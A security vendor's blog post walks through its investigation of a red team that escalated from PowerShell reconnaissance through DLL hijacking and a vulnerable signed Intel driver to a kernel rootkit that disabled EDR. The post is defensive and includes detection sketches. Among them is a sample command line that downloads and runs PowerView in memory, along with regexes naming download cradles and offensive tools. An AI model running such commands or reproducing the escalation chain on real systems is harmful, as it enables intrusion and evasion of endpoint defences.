Security operations · 9 MIN READ · BRITTON MANAHAN · JUL 28, 2021 · TAGS: Cloud security / MDR / Tech tools

We’re no strangers to red team engagements.

In fact, we love them.

Not only do they give our customers a chance to put our detection and response (D&R) skills to the test, they also let us exercise our incident response skills.

And this red team definitely gave us a workout as they progressed towards full control of the computer system.

Their goal was to evaluate our detection methodology and incident response (IR) proficiency, and they did so using a number of interesting and unique tools and techniques.

The red team was given physical access to a computer on the customer’s network and a valid domain user to unleash their havoc. We’ll refer to the computer as “Compromised_Host” and the valid user account as “User1” from here on out.



The incident began with some PowerShell-based reconnaissance and ended with the red team loading custom code into kernel memory on the system – aka a rootkit.

In this blog post, I’ll walk you through the initial detection, our investigation and share the insights we uncovered along the way.

Incoming!

Threat detection



TL;DR: We detected malicious PowerShell usage by the red team and notified the customer in eight minutes.



Our initial lead into the red team activity began with an endpoint alert based on a lightly obfuscated PowerShell command that attempted to download the PowerView privilege escalation framework from the PowerShell Empire PowerTools GitHub repository.

In the image below, you’ll see that this attempted download and in-memory execution of malicious PowerShell was blocked by the EDR product deployed on Compromised_Host.



Here’s the full PowerShell process command line and the deobfuscated remote URL:

When the URL is deobfuscated it appears as:

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1

Our analysts quickly determined this alert to be a true positive because:

- The command line parameter “-ep Bypass” bypasses any Script Execution Policy restrictions in place for the generated PowerShell process.

- The command downloads reconnaissance functionality from the well-known post-exploitation framework repository PowerShellEmpire.

- After the download completes, the command runs an imported function, Invoke-ShareFinder, with a parameter telling it to enumerate all network file shares readable by the current user.

- The download and execution of this function, Invoke-ShareFinder, intentionally operates exclusively in working memory and does not get stored to persistent storage (although the output does).

Had this PowerShell command succeeded, it would have executed the Invoke-ShareFinder function provided by powerview.ps1.
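The reasoning in the list above can be sketched as a simple indicator check. This is an illustrative Python sketch, not our detection logic: the indicator names, the regexes and the sample command line are assumptions made for the example. Only the URL is taken from the alert.

```python
import re

# Hypothetical indicators mirroring the analyst reasoning; not a production rule set.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|exec\w*)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "known_offensive_repo": re.compile(r"powershellempire|powertools|powerview", re.I),
    "share_enumeration": re.compile(r"invoke-sharefinder", re.I),
}

# Light obfuscation to strip before matching: backticks, carets, 'a'+'b' concatenation.
LIGHT_OBFUSCATION = re.compile(r"[`^]|['\"]\s*\+\s*['\"]")


def triage_powershell(command_line):
    """Return the names of the indicators present in a PowerShell command line."""
    cleaned = LIGHT_OBFUSCATION.sub("", command_line)
    return [name for name, pattern in INDICATORS.items() if pattern.search(cleaned)]


# Hypothetical command line for illustration; it is NOT the red team's actual command.
sample = (
    "powershell.exe -ep Bypass -c \"IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/Power'+'ShellEmpire/PowerTools/master/"
    "PowerView/powerview.ps1'); Invoke-ShareFinder\""
)

for hit in triage_powershell(sample):
    print("indicator:", hit)
```

No single indicator is conclusive on its own. It's the combination (policy bypass, remote download, in-memory execution and a known offensive tool) that makes a command line like this an easy true positive.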

With a clear indication of malicious activity, it was time to notify our customer.



Our analysts have a direct line of communication with our customers (through Slack or Microsoft Teams depending on which platform they use) – so within eight minutes, we went from initial alert to giving our customer details of the activity.

Then our analysts initiated a verification drop to our customer through the Expel Workbench™. From there, our customer authorized the activity and confirmed that a red team assessment was underway.

Want to know what our verification drop looks like? Here’s the Slack message to our customer:

And below is our Alert-to-fix timeline, available for our customers in the Expel Workbench™.

Signs of a rootkit: Start of our investigation

TL;DR: The installation of a suspicious Windows Driver immediately stood out to us when examining the host timeline. This activity would provide an attacker with unrestricted access to memory on the computer.

During our initial escalation and communication, we also generated a timeline for the Compromised_Host endpoint.

After inspecting the timeline generated through the EDR solution running on the computer, something immediately stood out to us.

EventName: CreateService

ComputerName: Compromised_Host

ProductType: 1

ServiceDisplayName: GuteDriver

ServiceErrorControl_decimal: 1

ServiceImagePath: C:\Users\User1\Desktop\Purple\Payloads\bp\Gute0.2\Gute0.2\GuteDriver.sys

ServiceStart: 4

ServiceType: 1

Time: 2021-04-20T15:33:56.794+0000

GuteDriver Rootkit Service Creation

This Windows service creation event tells us that GuteDriver.sys is being registered as a kernel driver, set to begin execution during system initialization based on the values of ServiceType and ServiceStart.

This means that the red team got kernel-level access to the computer system. Gaining kernel-level access allows unrestricted access to all working memory (aka RAM) on the computer system.

Malware that operates at this level is also referred to as a rootkit.

The file hash for GuteDriver.sys, obtained from the corresponding FileWrite event, was globally unique in the EDR product and unknown in VirusTotal and other OSINT sources. Also, the fact that the driver sat in a folder under User1’s Desktop was a huge red flag. It’s a complete anomaly for a Windows kernel driver to be located on a user’s desktop.
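That "driver in a user profile" anomaly is easy to express as a check. Here's a minimal Python sketch, assuming the service creation event is available as a dictionary with the field names shown in the event above. The function name and the path test are our own illustration, and the only Windows constant it relies on is the service type value 1 for kernel drivers.

```python
SERVICE_KERNEL_DRIVER = 1  # Win32 service type value for a kernel driver


def is_suspicious_driver_service(event):
    """Flag kernel driver registrations whose image path sits inside a user profile."""
    if event.get("EventName") != "CreateService":
        return False
    if int(event.get("ServiceType", 0)) != SERVICE_KERNEL_DRIVER:
        return False
    image_path = event.get("ServiceImagePath", "").lower()
    # Legitimate drivers normally live under the Windows directory, not under \Users\.
    return "\\users\\" in image_path


# Field values copied from the service creation event in this post.
gute_event = {
    "EventName": "CreateService",
    "ComputerName": "Compromised_Host",
    "ServiceDisplayName": "GuteDriver",
    "ServiceImagePath": r"C:\Users\User1\Desktop\Purple\Payloads\bp\Gute0.2\Gute0.2\GuteDriver.sys",
    "ServiceType": 1,
}

print(is_suspicious_driver_service(gute_event))
```

A check like this is deliberately narrow. It says nothing about whether the driver is malicious, only that its location deserves an analyst's attention.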

Initial red team activity

TL;DR: The red team, which was provided physical access to the Compromised_Host system and a logon session for User1, began their engagement by downloading Payloads.zip from dl.boxcloud.com.

With the malicious Windows driver activity identified, we continued to examine the host timeline with the initial tasks of locating the beginning of the red team activity and any potential lateral movement to other computer systems.

While no signs of successful lateral movement were present in the timeline, we noticed a series of file write events involving the path C:\Users\User1\Desktop\Purple\Payloads.

We then homed in on the events related to this path and determined that the earliest evidence of red team activity occurred at 14:33 UTC on the Compromised_Host computer system, with the download of the file Payloads.zip into User1’s Downloads folder.

This activity was immediately preceded by User1 launching a Chrome web browser process at 14:29 UTC, which then generated a DNS request for dl.boxcloud.com.

This timeline of events suggests that it’s highly likely that the archive file was hosted on and downloaded from the cloud storage service Box.com. The contents of Payloads.zip were then extracted into a new folder, Payloads, located within the folder Purple on User1’s Desktop.

These extracted files were the source of additional tools and tactics deployed by the red team, which we’ll be exploring together in the next sections of this blog post.

System reconnaissance

TL;DR: The red team used PowerShell and DotNet to locate local privilege escalation opportunities on the Compromised_Host endpoint.

The first events after the extraction of the contents of Payloads.zip are the compilation and immediate deletion of a DotNet Framework module with a file name of ibuyy111.dll.

Dotnet Module Compilation Event: \Device\HarddiskVolume4\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\User1\AppData\Local\Temp\ibuyy111.cmdline"

File Creation Time: 4/20/2021 14:36:25 UTC

File Deletion Time: 4/20/2021 14:36:25 UTC

ibuyy111.dll details

With a parent process of PowerShell.exe and the immediate deletion of the compiled DotNet module, this command line directly correlates to PowerShell invoking the C# Command-Line Compiler behind the scenes as a result of importing a new DotNet class through C# source code (yes – PowerShell can do that).

This functionality is made possible through the Add-Type PowerShell cmdlet, which supports inline C# source code through the TypeDefinition parameter.

powershell -Command "Add-Type -TypeDefinition 'public class Demo {public int a;}'"
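The pattern described here (PowerShell spawning csc.exe against a temporary .cmdline file) can be matched in process telemetry. Below is a rough Python sketch. The function name and its three arguments are hypothetical, and the full PowerShell path in the example is assumed, since the post only tells us the parent was PowerShell.exe.

```python
import re
from pathlib import PureWindowsPath

# Matches the @"...\Temp\<name>.cmdline" response-file argument passed to csc.exe.
CMDLINE_ARG = re.compile(r'@"[^"]*\\Temp\\[^"\\]+\.cmdline"', re.I)


def is_add_type_compilation(parent_image, image, command_line):
    """True when PowerShell launches the C# compiler against a Temp .cmdline file."""
    parent = PureWindowsPath(parent_image).name.lower()
    child = PureWindowsPath(image).name.lower()
    return (
        parent in {"powershell.exe", "pwsh.exe"}
        and child == "csc.exe"
        and CMDLINE_ARG.search(command_line) is not None
    )


# Parent path is an assumption; image and command line follow the event in this post.
print(is_add_type_compilation(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"\Device\HarddiskVolume4\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
    r'@"C:\Users\User1\AppData\Local\Temp\ibuyy111.cmdline"',
))
```

Add-Type is used by plenty of legitimate scripts, so a match here is context for an investigation rather than an alert in its own right.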

To find out more about the PowerShell activity on the host, we used the PSReadLine console history file, which maintains a record of PowerShell commands entered into an interactive PowerShell console session for each user account. This file exists so that the PSReadLine module, which is included by default with Windows 10, can provide command line history functionality for PowerShell in line with the Bash shell on Linux.

From the PSReadLine console history file for User1 we saw that the following command was entered:

Import-Module .\Vscanner.ps1 > Vulns.txt

While this evidence source does not include timestamps, based on the creation time of the Vulns.txt file we had from the timeline, this command was likely the origin of the DotNet module activity.
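For readers who want to pull the same evidence, here's a small Python sketch that reads a user's PSReadLine history from a collected profile directory and filters it by keyword. The relative path is the PSReadLine default for the Windows PowerShell console. The function names and the keyword list are our own, and the profile path in the example is a placeholder.

```python
from pathlib import Path

# Default PSReadLine history location, relative to a Windows user profile directory.
HISTORY_RELATIVE = Path(
    "AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
)


def read_history(profile_dir):
    """Return the non-empty commands recorded for one user profile, in file order."""
    history_file = Path(profile_dir) / HISTORY_RELATIVE
    if not history_file.exists():
        return []
    text = history_file.read_text(encoding="utf-8", errors="replace")
    return [line.strip() for line in text.splitlines() if line.strip()]


def commands_matching(history, keywords):
    """Case-insensitive substring filter over history lines."""
    lowered = [k.lower() for k in keywords]
    return [cmd for cmd in history if any(k in cmd.lower() for k in lowered)]


# Placeholder path: point this at a mounted image or collected copy of the profile.
history = read_history("/evidence/Users/User1")
for command in commands_matching(history, ["import-module", "invoke-"]):
    print(command)
```

Because the file carries no timestamps, the order of lines is the only sequencing information it offers. Timing has to come from other sources, such as file creation times in the EDR timeline.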

Based on the name Vscanner.ps1 and created file names Vulns.txt, along with interesting paths.txt, the main objective of Vscanner.ps1 and ibuyy111.dll was discovering potential privilege escalation vulnerabilities on the Compromised_Host computer system.

Blocked/failed executions

TL;DR: The red team attempted but failed to perform a DNS Zone Transfer and had additional reconnaissance tools blocked by EDR.

After they succeeded at enumerating local privilege escalation opportunities, the red team failed in their next three execution attempts.

The first of these attempts was a failed DNS Zone Transfer, followed by the previously mentioned blocked attempt to download and execute PowerView, which was our initial lead into the presence of the red team.

The third unsuccessful execution activity was two attempts to bypass detection of the SharpHound tool by employing obfuscation. SharpHound is the C# version of BloodHound, a penetration testing tool for enumerating Active Directory accounts and how their permissions overlap through graph theory.

The red team attempted to import and execute two different obfuscated copies of SharpHound as a PowerShell module, a fact supported by the PSReadLine history file excerpt provided below.

Both attempts were detected and blocked by EDR, which also created an Expel Alert.

Import-Module .\sh-obf1.ps1

Import-Module .\sh-obf2.ps1

invokE-BloOdhOuNd

Import-Module .\sh-obf2.ps1

invokE-BloOdhOuNd

Bloodhound related section of PSReadLine History File
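Mixed-case names like invokE-BloOdhOuNd only defeat case-sensitive string matching. PowerShell treats command names case-insensitively, so a reviewer's tooling should too. A minimal Python sketch, assuming a small hypothetical watchlist of command names:

```python
import re

# Hypothetical watchlist, stored case-folded; extend with whatever your team tracks.
WATCHLIST = {"invoke-bloodhound", "invoke-sharefinder"}

# Verb-Noun shaped tokens, the usual form of PowerShell command names.
COMMAND_TOKEN = re.compile(r"[A-Za-z]+-[A-Za-z]+")


def watchlisted_commands(history_lines):
    """Return tokens from the history whose case-folded form is on the watchlist."""
    hits = []
    for line in history_lines:
        for token in COMMAND_TOKEN.findall(line):
            if token.casefold() in WATCHLIST:
                hits.append(token)
    return hits


# Lines from the history excerpt in this post.
excerpt = [
    r"Import-Module .\sh-obf1.ps1",
    r"Import-Module .\sh-obf2.ps1",
    "invokE-BloOdhOuNd",
    r"Import-Module .\sh-obf2.ps1",
    "invokE-BloOdhOuNd",
]

print(watchlisted_commands(excerpt))
```

This only handles case games. Obfuscation inside the script files themselves (the sh-obf1.ps1 and sh-obf2.ps1 contents) needs behavioral detection, which is what the EDR provided here.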

Privilege escalation

TL;DR: The red team used DLL load order hijacking to execute a custom DLL file under the Local System account and then create a new local admin user. They likely got the information used to conduct this local privilege escalation from Vscanner.ps1.

Following this series of failed execution attempts, the red team then used information likely gained from their earlier successful privilege escalation enumeration.

At 15:09 UTC, the red team wrote the WptsExtensions.dll file extracted from Payloads.zip into the directory C:\Program Files\Citrix\ICAService in order to establish DLL load order hijacking.

We spotted this when comparing the following two FileWrite events for WptsExtensions.dll, which have the same file hash.

EventName: FileWrite

ComputerName: COMPROMISED_HOST

FileName: WptsExtensions.dll

FilePath: \Device\HarddiskVolume4\Users\User1\Desktop\Purple\Payloads\Payloads

CompleteFilePath: \Device\HarddiskVolume4\Users\User1\Desktop\Purple\Payloads\Payloads\WptsExtensions.dll

SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e

Time: 2021-04-20T14:34:08

EventName: FileWrite

ComputerName: COMPROMISED_HOST

FileName: WptsExtensions.dll

FilePath: \Device\HarddiskVolume4\Program Files\Citrix\ICAService

CompleteFilePath: \Device\HarddiskVolume4\Program Files\Citrix\ICAService\WptsExtensions.dll

SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e

Time: 2021-04-20T15:09:23

FileWrite events for WptsExtensions.dll
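The comparison we did by eye can be automated: group FileWrite events by hash and look for the same content landing first in a user-writable folder and then in an application directory. The Python sketch below assumes events arrive as dictionaries using the field names from the two events above. The function names and the path heuristics are our own illustration.

```python
from collections import defaultdict


def hashes_in_multiple_dirs(events):
    """Map each SHA256 to the directories it was written to, keeping hashes seen in 2+."""
    dirs_by_hash = defaultdict(set)
    for event in events:
        if event["EventName"] == "FileWrite":
            dirs_by_hash[event["SHA256Hash"]].add(event["FilePath"])
    return {h: sorted(d) for h, d in dirs_by_hash.items() if len(d) > 1}


def staged_then_planted(directories):
    """True when one copy sits under a user profile and another under Program Files."""
    lowered = [d.lower() for d in directories]
    return (any("\\users\\" in d for d in lowered)
            and any("\\program files" in d for d in lowered))


# Values copied from the two FileWrite events in this post.
DLL_HASH = "9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e"
file_writes = [
    {"EventName": "FileWrite", "FileName": "WptsExtensions.dll", "SHA256Hash": DLL_HASH,
     "FilePath": r"\Device\HarddiskVolume4\Users\User1\Desktop\Purple\Payloads\Payloads"},
    {"EventName": "FileWrite", "FileName": "WptsExtensions.dll", "SHA256Hash": DLL_HASH,
     "FilePath": r"\Device\HarddiskVolume4\Program Files\Citrix\ICAService"},
]

for sha256, directories in hashes_in_multiple_dirs(file_writes).items():
    print(sha256, staged_then_planted(directories))
```

Installers also copy files into Program Files, so the interesting signal is the source directory: a DLL staged on a user's Desktop before appearing next to a service binary.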

Following this DLL load order hijacking setup, several Citrix-related service processes were started, which would have likely loaded this DLL, running under the SYSTEM user context.

This activity was then followed by the User1 account launching a new cmd process under the context of the LocalAdmin1 account.

\Device\HarddiskVolume4\Windows\System32\runas.exe runas /user:LocalAdmin1 cmd

Privilege escalation to local admin account

The red team report – a summary of actions performed during the engagement – confirmed that this malicious DLL used the higher permissions obtained through DLL load order hijacking to covertly create a new local admin account on the computer system.

Kernel memory access

TL;DR: The red team installed and exploited an old Intel driver to bypass the Windows Driver Signature Enforcement protection and install their own custom driver. Using this custom code running in the kernel memory space, the red team disabled the EDR solution running on the endpoint.

As the title suggests, things escalated quickly.

With their privileges on the Compromised_Host system elevated to local administrator, the red team wasn’t yet satisfied with their heightened control of the system.

Working through the LocalAdmin1 account, the red team disabled two local services running on the Compromised_Host system – a Splunk forwarder service and a service for a third-party IR vendor.

Then they launched the executable program Gute.exe at 15:29 UTC, another file hash with zero global matches in the EDR solution and across OSINT.



The EDR details for this event let us know that the Gute.exe process was responsible for both writing and registering the Windows Driver file NalDrv.sys at 15:31 UTC. The hash for this file – 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b – did return results when searching across VirusTotal and other OSINT sources.

The NalDrv.sys file, original file name iQVW64.SYS, is a signed Intel driver from 2013 that isn’t inherently malicious. What this driver can provide an attacker is based on a combination of its valid driver signature and established vulnerability CVE-2015-2291.

This combination allows an attacker to turn the authentic driver into a vehicle to access and modify kernel-level memory on the local computer system. An example of this technique is the Kernel Driver Utility, which includes this exact CVE as one of the vulnerabilities it can leverage to provide access into kernel memory from user mode.

One of the many things you can do with this unrestricted level of access is bypass the Windows Driver Signature Enforcement and load any driver of your choosing into kernel mode.

This Gute.exe and NalDrv.sys activity brings us back full circle to the unknown GuteDriver.sys file mentioned earlier in this post, which was installed as a Windows driver service two minutes after the NalDrv.sys activity at 15:33 UTC.
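The sequence described here (a known-vulnerable signed driver is written, then an unknown kernel driver service appears shortly afterward) lends itself to a simple correlation. The Python sketch below is illustrative only. The simplified event shape, the field names and the 15-minute window are assumptions, and the NalDrv.sys write is pinned to 15:31:00 because the post only gives the minute.

```python
from datetime import datetime, timedelta

# Hash of NalDrv.sys (original name iQVW64.SYS) as reported in this post.
KNOWN_VULNERABLE_DRIVER_HASHES = {
    "4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b",
}


def vulnerable_driver_followups(events, window=timedelta(minutes=15)):
    """Pair each vulnerable-driver write with kernel driver services created soon after."""
    ordered = sorted(events, key=lambda e: e["time"])
    findings = []
    for index, event in enumerate(ordered):
        if event["name"] != "FileWrite":
            continue
        if event.get("sha256") not in KNOWN_VULNERABLE_DRIVER_HASHES:
            continue
        for later in ordered[index + 1:]:
            if later["time"] - event["time"] > window:
                break
            # service_type 1 is the Win32 value for a kernel driver.
            if later["name"] == "CreateService" and later.get("service_type") == 1:
                findings.append((event["file"], later["service"]))
    return findings


# Simplified, hypothetical event shape populated with values from this post.
host_events = [
    {"name": "CreateService", "service": "GuteDriver", "service_type": 1,
     "time": datetime(2021, 4, 20, 15, 33, 56)},
    {"name": "FileWrite", "file": "NalDrv.sys",
     "sha256": "4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b",
     "time": datetime(2021, 4, 20, 15, 31, 0)},
]

print(vulnerable_driver_followups(host_events))
```

A hash list will always lag behind the drivers attackers choose to bring along, so in practice this pairs best with the location-based check on where the second driver was loaded from.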

We didn’t notice anything happening on the Compromised_Host system after this activity. The red team report confirmed that this system kernel-level access was used to disable the EDR solution running on Compromised_Host.

With the red team activity limited to the Compromised_Host and our visibility cut off with the disabling of EDR, we concluded our investigation.

The red team report also showed us that the red team successfully executed Mimikatz and obtained plaintext passwords after disabling EDR on the host.

In a real-world critical incident, the box would have been isolated prior to the activity that provided the red team access to kernel-level memory. However, it’s common practice not to disrupt red teams during their engagements because it ensures security controls across the attack lifecycle are examined regardless of results in the previous phase.

Quick recap

We just went through a lot of technical info. To make it easier to digest, we figured it would be helpful to give a short recap of what went down.

Below is a detailed timeline of this red team incident, broken down into both their actions on the computer system Compromised_Host and our communications with the customer during the incident.
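For anyone rebuilding the host side of that timeline from this post, the sketch below merges the times quoted in the sections above into one ordered view. It's a Python illustration with our own function name and event descriptions. It covers only host events whose times appear in this post (all UTC on 2021-04-20), and times given only to the minute are entered with zero seconds.

```python
from datetime import datetime

# (time, description) pairs taken from the sections above, deliberately unsorted.
HOST_EVENTS = [
    ("15:33:56", "GuteDriver.sys registered as a kernel driver service"),
    ("14:33:00", "Payloads.zip downloaded to User1's Downloads folder"),
    ("15:09:23", "WptsExtensions.dll written to the Citrix ICAService directory"),
    ("14:29:00", "User1 launches Chrome"),
    ("15:31:00", "Gute.exe writes and registers NalDrv.sys"),
    ("14:36:25", "ibuyy111.dll compiled and deleted"),
    ("15:29:00", "Gute.exe launched"),
    ("14:34:08", "WptsExtensions.dll extracted to the Payloads folder"),
]


def build_timeline(events, day="2021-04-20"):
    """Sort events and attach the elapsed time since the first one."""
    parsed = [
        (datetime.strptime(f"{day} {clock}", "%Y-%m-%d %H:%M:%S"), description)
        for clock, description in events
    ]
    parsed.sort(key=lambda item: item[0])
    start = parsed[0][0]
    return [(stamp, stamp - start, description) for stamp, description in parsed]


for stamp, elapsed, description in build_timeline(HOST_EVENTS):
    print(f"{stamp:%H:%M:%S}  +{elapsed}  {description}")
```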

What this means for you

This red team engagement serves as a strong reminder that the alert is often the tipping point, but not the full story.

While the incident began with an unsophisticated PowerShell download cradle, it quickly escalated into something that could have been a serious incident in the real world.

If this were a real attack, it would have been difficult for any org to prevent and contain. That’s especially true when considering a custom rootkit was deployed and EDR was disabled on the system.

Bad actors are getting creative and have the ability to surprise you with novel attack techniques. This is why you need to have an equally creative mindset when it comes to detection and investigation. And, again, it’s why we love red teams. Bringing in a red team to test your security controls and protocols against the latest tactics can help you keep bad actors out down the road.

Have any interesting red team stories you’d like to share? We’d love to hear them! Let’s chat (yes – a real human will respond).